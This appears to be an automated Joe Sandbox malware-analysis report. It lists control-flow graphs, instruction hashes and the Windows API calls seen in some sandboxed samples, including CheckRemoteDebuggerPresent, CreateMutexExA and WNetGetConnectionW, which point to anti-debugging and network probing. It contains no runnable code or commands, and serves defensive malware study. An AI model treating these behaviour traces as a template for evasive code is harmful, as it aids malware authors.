7ff70b8d6d03-7ff70b8d6d09 1624->1628 1641 7ff70b8d6afd-7ff70b8d6b03 1625->1641 1642 7ff70b8d6d48-7ff70b8d6d50 1625->1642 1629 7ff70b8d6e35-7ff70b8d6e3b 1626->1629 1630 7ff70b8d6c58-7ff70b8d6c5e 1626->1630 1627->1612 1645 7ff70b8d6d0f-7ff70b8d6d17 1628->1645 1646 7ff70b8d6f1b-7ff70b8d6f2d 1628->1646 1660 7ff70b8d6e41-7ff70b8d6e46 1629->1660 1661 7ff70b8d6fb9-7ff70b8d6fc1 1629->1661 1662 7ff70b8d6c64-7ff70b8d6c6c 1630->1662 1663 7ff70b8d6ecc-7ff70b8d6edb 1630->1663 1647 7ff70b8d6e83-7ff70b8d6e93 call 7ff70b945870 1631->1647 1648 7ff70b8d6b80-7ff70b8d6b88 1631->1648 1650 7ff70b8d6d96-7ff70b8d6d9e 1632->1650 1651 7ff70b8d6f32-7ff70b8d6f4b 1632->1651 1664 7ff70b8d6e57-7ff70b8d6e6b 1633->1664 1665 7ff70b8d6fc9-7ff70b8d6fd1 1633->1665 1666 7ff70b8d6c94-7ff70b8d6c9c 1634->1666 1667 7ff70b8d6ee0-7ff70b8d6ee5 1634->1667 1654 7ff70b8d6f64-7ff70b8d6f7d 1635->1654 1655 7ff70b8d6deb-7ff70b8d6df3 1635->1655 1652 7ff70b8d6be4-7ff70b8d6bec 1636->1652 1653 7ff70b8d6e98-7ff70b8d6e9f 1636->1653 1668 7ff70b8d6cdf-7ff70b8d6ce7 1637->1668 1669 7ff70b8d6aac-7ff70b8d6acb 1637->1669 1638->1612 1656 7ff70b8d6e0f-7ff70b8d6e17 1639->1656 1657 7ff70b8d6f81-7ff70b8d6f92 1639->1657 1658 7ff70b8d6c34-7ff70b8d6c3c 1640->1658 1659 7ff70b8d6eb8-7ff70b8d6ec7 1640->1659 1643 7ff70b8d6e70-7ff70b8d6e7e call 7ff70b93f570 1641->1643 1644 7ff70b8d6b09-7ff70b8d6b11 1641->1644 1642->1612 1649 7ff70b8d6d56-7ff70b8d6d5e 1642->1649 1643->1612 1644->1612 1670 7ff70b8d6b13-7ff70b8d6b4b FindCloseChangeNotification 1644->1670 1645->1612 1685 7ff70b8d6d1d-7ff70b8d6d38 1645->1685 1646->1612 1647->1612 1648->1612 1672 7ff70b8d6b8e-7ff70b8d6bb6 1648->1672 1649->1612 1686 7ff70b8d6d64-7ff70b8d6d85 1649->1686 1650->1612 1687 7ff70b8d6da4-7ff70b8d6dcf 1650->1687 1673 7ff70b8d6f53-7ff70b8d6f5f 1651->1673 1674 7ff70b8d6f4d 1651->1674 1652->1612 1676 7ff70b8d6bf2-7ff70b8d6c03 1652->1676 1653->1669 1692 7ff70b8d6ea5-7ff70b8d6ead 1653->1692 1654->1674 1675 7ff70b8d6f7f 1654->1675 1655->1612 1688 7ff70b8d6df9-7ff70b8d6dfe 1655->1688 1656->1612 1689 7ff70b8d6e1d-7ff70b8d6e30 1656->1689 1677 7ff70b8d6f94 1657->1677 1678 7ff70b8d6f9c-7ff70b8d6fb4 CreateMutexExA 1657->1678 1658->1612 1680 7ff70b8d6c42-7ff70b8d6c47 1658->1680 1659->1612 1660->1612 1661->1612 1679 7ff70b8d6fc7 1661->1679 1662->1612 1682 7ff70b8d6c72-7ff70b8d6c77 1662->1682 1663->1612 1664->1612 1665->1612 1681 7ff70b8d6fd7 call 7ff70b9447d0 1665->1681 1666->1612 1683 7ff70b8d6ca2-7ff70b8d6cb6 1666->1683 1667->1612 1668->1612 1684 7ff70b8d6ced-7ff70b8d6cf2 1668->1684 1669->1612 1670->1612 1672->1612 1673->1612 1674->1673 1675->1673 1676->1612 1677->1678 1678->1612 1695 7ff70b8d6fdc-7ff70b8d6ff0 1679->1695 1680->1612 1681->1695 1682->1612 1698 7ff70b8d6cbd-7ff70b8d6cc2 1683->1698 1699 7ff70b8d6cb8 1683->1699 1684->1612 1685->1612 1693 7ff70b8d6d3e-7ff70b8d6d43 1685->1693 1686->1612 1687->1612 1694 7ff70b8d6dd5-7ff70b8d6dda 1687->1694 1688->1612 1689->1612 1692->1669 1701 7ff70b8d6eb3 1692->1701 1693->1612 1694->1612 1698->1612 1699->1698 1701->1612
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseFindNotification
                                                                                      • String ID:
                                                                                      • API String ID: 2591292051-0
                                                                                      • Opcode ID: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
                                                                                      • Instruction ID: cee889d9c80bcb4c86bc9e6e82c40f5de93786789685e2d9d76410442e50e43a
                                                                                      • Opcode Fuzzy Hash: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
                                                                                      • Instruction Fuzzy Hash: 10C1E521A0C66986E6686B1C6C9093DA790DF54750FE0413BE58FC7BF4FF2CEA604B91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1717 7ff70b945680-7ff70b9456a4 1718 7ff70b9456c0-7ff70b9456c5 1717->1718 1719 7ff70b9456c7-7ff70b9456cc 1718->1719 1720 7ff70b9456e0-7ff70b9456e5 1718->1720 1721 7ff70b9456ce-7ff70b9456d3 1719->1721 1722 7ff70b9456a6-7ff70b9456bc call 7ff70b946260 1719->1722 1723 7ff70b945707-7ff70b94572d RtlAllocateHeap 1720->1723 1724 7ff70b9456e7-7ff70b9456ec 1720->1724 1725 7ff70b94572f-7ff70b945734 1721->1725 1726 7ff70b9456d5-7ff70b9456da 1721->1726 1722->1718 1723->1718 1724->1718 1727 7ff70b9456ee-7ff70b945705 1724->1727 1725->1718 1729 7ff70b945736-7ff70b945740 1725->1729 1726->1718 1727->1718
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
                                                                                      • Instruction ID: a7401534e395c89576441d2b2bdb6487f2deb17285db4ba7bd115faa070854a9
                                                                                      • Opcode Fuzzy Hash: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
                                                                                      • Instruction Fuzzy Hash: 1C115121938B45C3DA606F49AC9052EA691EF987A4FD10532E98EC3374CF6DDA504A20

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1731 7ff70b9413d0-7ff70b9413ea 1732 7ff70b94141d-7ff70b941423 1731->1732 1733 7ff70b9413f0-7ff70b941418 IsDlgButtonChecked 1732->1733 1734 7ff70b941425-7ff70b94142b 1732->1734 1733->1732 1734->1732 1735 7ff70b94142d-7ff70b94144a 1734->1735
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID: ButtonChecked
                                                                                      • String ID:
                                                                                      • API String ID: 1719414920-0
                                                                                      • Opcode ID: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
                                                                                      • Instruction ID: ad0808859f5090b72b56ea44d694c3626a4358c9d05a5136d5013f16292c8f00
                                                                                      • Opcode Fuzzy Hash: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
                                                                                      • Instruction Fuzzy Hash: 4CF0C266A1C29084EA345625F94467AAE60DB99BF4F980875ED8E87BA8CB1DC7818700

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1736 7ff70b945750-7ff70b945789 1737 7ff70b9457ac-7ff70b9457b2 1736->1737 1738 7ff70b945790-7ff70b9457a7 RtlAllocateHeap 1737->1738 1739 7ff70b9457b4-7ff70b9457ba 1737->1739 1738->1737 1739->1737 1740 7ff70b9457bc-7ff70b9457ca 1739->1740
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
                                                                                      • Instruction ID: ec3ff780a75a2dac9405b21a6f6378db5712f9355b752443f5a0cda2536129d1
                                                                                      • Opcode Fuzzy Hash: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
                                                                                      • Instruction Fuzzy Hash: ABF01D35629B44C6DAA89B59F89062DB7A8FBC8790F501135FA8F83B78DF3DC5508B10

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1741 7ff70b945c40-7ff70b945c5f 1742 7ff70b945c8f-7ff70b945c95 1741->1742 1743 7ff70b945c97-7ff70b945c9d 1742->1743 1744 7ff70b945c70-7ff70b945c8a RtlAllocateHeap 1742->1744 1743->1742 1745 7ff70b945c9f-7ff70b945cad 1743->1745 1744->1742
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
                                                                                      • Instruction ID: 0f7fa2d7f3e84afb68762b73b6791ec2f084519d473386ba527b8a2e1e9e44c0
                                                                                      • Opcode Fuzzy Hash: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
                                                                                      • Instruction Fuzzy Hash: 32F0E525628B40C6DA789749ACD063AB7A1FF98741F800176EE4F83774CF7CC5008710

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1746 7ff70b922f40-7ff70b922f52 1747 7ff70b922f74-7ff70b922f7a 1746->1747 1748 7ff70b922f7c-7ff70b922f82 1747->1748 1749 7ff70b922f60-7ff70b922f6f GetFileAttributesA 1747->1749 1748->1747 1750 7ff70b922f84-7ff70b922f94 1748->1750 1749->1747
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
                                                                                      • Instruction ID: 939aa31d2748f67633e79ec49d52513d8c0439513b8e8cf903be75e336021782
                                                                                      • Opcode Fuzzy Hash: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
                                                                                      • Instruction Fuzzy Hash: 28E0D846D2D291C2A538132928500B9BB615F96354FB50335E6AF91AF0CB0DCB575A14
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: X,n$Y,n$Y,n
                                                                                      • API String ID: 0-3478138459
                                                                                      • Opcode ID: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
                                                                                      • Instruction ID: 20a04874f78178bd3d95e3d0e7725685ab855132de6f99277aaac0750d530fe7
                                                                                      • Opcode Fuzzy Hash: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
                                                                                      • Instruction Fuzzy Hash: 8A917F22F25B49C8FB119B7E98413AC67B0BF48B98F544622DE4DA3774DF38D5928310
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ]t{$]t{
                                                                                      • API String ID: 0-2389501032
                                                                                      • Opcode ID: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
                                                                                      • Instruction ID: 22e18c69bde135e380d89d45d37c9451e2391788e42f6556b6339536644cc6af
                                                                                      • Opcode Fuzzy Hash: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
                                                                                      • Instruction Fuzzy Hash: 35B193A1D1C34247FD7C662E18A59BDE5916FA0200ED4023BE54FC6AF1CF7DBB6046A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
                                                                                      • Instruction ID: 0b0a50d7d2f321efcf9528a390d8b3140f2e34459eba903fdb87f7ecea564043
                                                                                      • Opcode Fuzzy Hash: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
                                                                                      • Instruction Fuzzy Hash: B812FE2AA0C19147EA74563C5890A3EE7919F44304FE44837F69FC67F8CB1DEE548791
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID: FA2$FA2$PG<;$PG<;
                                                                                      • API String ID: 2738559852-1104478874
                                                                                      • Opcode ID: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
                                                                                      • Instruction ID: ae0615004817d554e664375e905b9088a6e61ca571e973f8f3de5a1389818ea9
                                                                                      • Opcode Fuzzy Hash: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
                                                                                      • Instruction Fuzzy Hash: 27213721E2C18181EA302B19DC04279BA60AF45764FD54633EE5ECE7E0CB3CDA499770
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: aCo2$aCo2$/~$/~
                                                                                      • API String ID: 0-3304968679
                                                                                      • Opcode ID: 22d7c74f97c3fa7b79090f9a1661b0688eada34713547cfb80454c75f8ba8637
                                                                                      • Instruction ID: 849912e2ed82e839ba734fa3022ff9549cbb3174cfae193e6fd3acf560120880
                                                                                      • Opcode Fuzzy Hash: 22d7c74f97c3fa7b79090f9a1661b0688eada34713547cfb80454c75f8ba8637
                                                                                      • Instruction Fuzzy Hash: D7B1FC36A1D20286FA24969C6840B3EE6D19F44B48FA44436E56FC77F4CF2CEE514BD2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID: BoundaryDeleteDescriptor
                                                                                      • String ID: 8qJ$9qJ$9qJ
                                                                                      • API String ID: 3203483114-2728310733
                                                                                      • Opcode ID: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
                                                                                      • Instruction ID: d6244992cb56d62f15330c13493b15d8a30d81804f045f70318e38f6c4909303
                                                                                      • Opcode Fuzzy Hash: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
                                                                                      • Instruction Fuzzy Hash: C2018C11E1C006C3FA746B9D1891E3884905F64B49FF35832D80FC63B0EF98DB824221

                                                                                      Execution Graph

                                                                                      Execution Coverage:13.5%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:17.4%
                                                                                      Total number of Nodes:23
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 6963 7ff7c08c11e1 6965 7ff7c08c11e7 ExtractAssociatedIconA 6963->6965 6966 7ff7c08c1366 6965->6966 6941 7ff7c08c3d3f 6943 7ff7c08c3d46 6941->6943 6942 7ff7c08c404d WNetGetConnectionW 6944 7ff7c08c40a8 6942->6944 6943->6942 6943->6943 6945 7ff7c08c3d7c 6943->6945 6946 7ff7c08c3eb8 6948 7ff7c08c3ebd WNetGetConnectionW 6946->6948 6949 7ff7c08c40a8 6948->6949 6950 7ff7c08c3238 6951 7ff7c08c3283 6950->6951 6952 7ff7c08c3380 CheckRemoteDebuggerPresent 6951->6952 6953 7ff7c08c33cf 6952->6953 6954 7ff7c08c51ee 6955 7ff7c08c5211 6954->6955 6958 7ff7c08c3d00 6955->6958 6957 7ff7c08c5235 6960 7ff7c08c3d1a 6958->6960 6959 7ff7c08c3d7c 6959->6957 6960->6959 6961 7ff7c08c404d WNetGetConnectionW 6960->6961 6962 7ff7c08c40a8 6961->6962 6962->6957

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 161 7ff7c08c3d00-7ff7c08c3d6d 165 7ff7c08c3d73-7ff7c08c3d76 161->165 166 7ff7c08c3e8c-7ff7c08c3e96 161->166 167 7ff7c08c3e97-7ff7c08c3ea5 165->167 168 7ff7c08c3d7c-7ff7c08c3d81 165->168 175 7ff7c08c3eaa-7ff7c08c3f4f 167->175 176 7ff7c08c3ea7-7ff7c08c3ea9 167->176 168->166 169 7ff7c08c3d87-7ff7c08c3d8e 168->169 170 7ff7c08c3d90-7ff7c08c3d93 169->170 171 7ff7c08c3d95-7ff7c08c3d98 169->171 170->171 173 7ff7c08c3da7-7ff7c08c3dc2 call 7ff7c08c2c10 170->173 171->166 174 7ff7c08c3d9e-7ff7c08c3da1 171->174 180 7ff7c08c3dc7-7ff7c08c3dc9 173->180 174->166 174->173 183 7ff7c08c3f51-7ff7c08c3f59 175->183 184 7ff7c08c3f5c-7ff7c08c3f68 175->184 176->175 180->166 182 7ff7c08c3dcf-7ff7c08c3e53 call 7ff7c08c0fb0 180->182 222 7ff7c08c3e55-7ff7c08c3e59 182->222 223 7ff7c08c3e5b-7ff7c08c3e68 182->223 183->184 185 7ff7c08c4008-7ff7c08c4010 184->185 186 7ff7c08c3f6e-7ff7c08c3f9a 184->186 189 7ff7c08c4012-7ff7c08c4048 185->189 190 7ff7c08c3fe7-7ff7c08c3fee 185->190 195 7ff7c08c3ff0-7ff7c08c3ff6 186->195 196 7ff7c08c3f9c-7ff7c08c3f9e 186->196 192 7ff7c08c404d-7ff7c08c40a6 WNetGetConnectionW 189->192 190->192 197 7ff7c08c40a8 192->197 198 7ff7c08c40ae-7ff7c08c40c3 192->198 205 7ff7c08c3ff8-7ff7c08c4002 195->205 200 7ff7c08c3fa0-7ff7c08c3fb2 196->200 201 7ff7c08c3fd7-7ff7c08c3fe5 196->201 197->198 210 7ff7c08c40c5-7ff7c08c40e7 198->210 211 7ff7c08c40e8-7ff7c08c411a call 7ff7c08c4136 198->211 203 7ff7c08c3fb6-7ff7c08c3fc9 200->203 204 7ff7c08c3fb4 200->204 201->205 203->203 209 7ff7c08c3fcb-7ff7c08c3fd3 203->209 204->203 205->185 209->201 210->211 216 7ff7c08c4121-7ff7c08c4135 211->216 217 7ff7c08c411c 211->217 217->216 222->223 224 7ff7c08c3e6a-7ff7c08c3e6e 222->224 226 7ff7c08c3e78-7ff7c08c3e8b 223->226 224->226
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2820718333.00007FF7C08C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c08c0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14744da4a368ebf994de33195638c6335f204d68a0a793dcaa4c7df1ddc3f156
                                                                                      • Instruction ID: 9a7f4082469fcce62714a6facbfe2e1a9f91ccfcacb18381a13927346be348f2
                                                                                      • Opcode Fuzzy Hash: 14744da4a368ebf994de33195638c6335f204d68a0a793dcaa4c7df1ddc3f156
                                                                                      • Instruction Fuzzy Hash: 17D1A630A18A494FE7A8EF2898557B9B7E1FF55320F44817ED84EC7792CF34A8428781

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 285 7ff7c08c3238-7ff7c08c33cd call 7ff7c08c2e88 CheckRemoteDebuggerPresent 292 7ff7c08c33cf 285->292 293 7ff7c08c33d5-7ff7c08c3418 285->293 292->293
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2820718333.00007FF7C08C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c08c0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: 03d4b97231325e73541b3c3edfcfba4c4a527d01044b6a4eddde1ee6ca48baa2
                                                                                      • Instruction ID: dcd3ca94b10e465235cdb002e2af76d92511f04c703d9d046dc01ba533471616
                                                                                      • Opcode Fuzzy Hash: 03d4b97231325e73541b3c3edfcfba4c4a527d01044b6a4eddde1ee6ca48baa2
                                                                                      • Instruction Fuzzy Hash: CC51047190D7C88FD706DB6888597A9BFF0EF66315F08419EC489CB293CB78A816C791

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2820718333.00007FF7C08C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c08c0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID: Connection
                                                                                      • String ID:
                                                                                      • API String ID: 1722446006-0
                                                                                      • Opcode ID: 120111fb9b2305215a008c59f4d1b40f44837e7559b26920610e118dc850bccd
                                                                                      • Instruction ID: 07e69bb6e02b731b59c571722a0b508817cfbdce8428d2d0356a2974f789775b
                                                                                      • Opcode Fuzzy Hash: 120111fb9b2305215a008c59f4d1b40f44837e7559b26920610e118dc850bccd
                                                                                      • Instruction Fuzzy Hash: 9F816D30518A8D8FDB68EF1898457E977E1EB59310F00826EE84DC7792CF34A985CB81

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
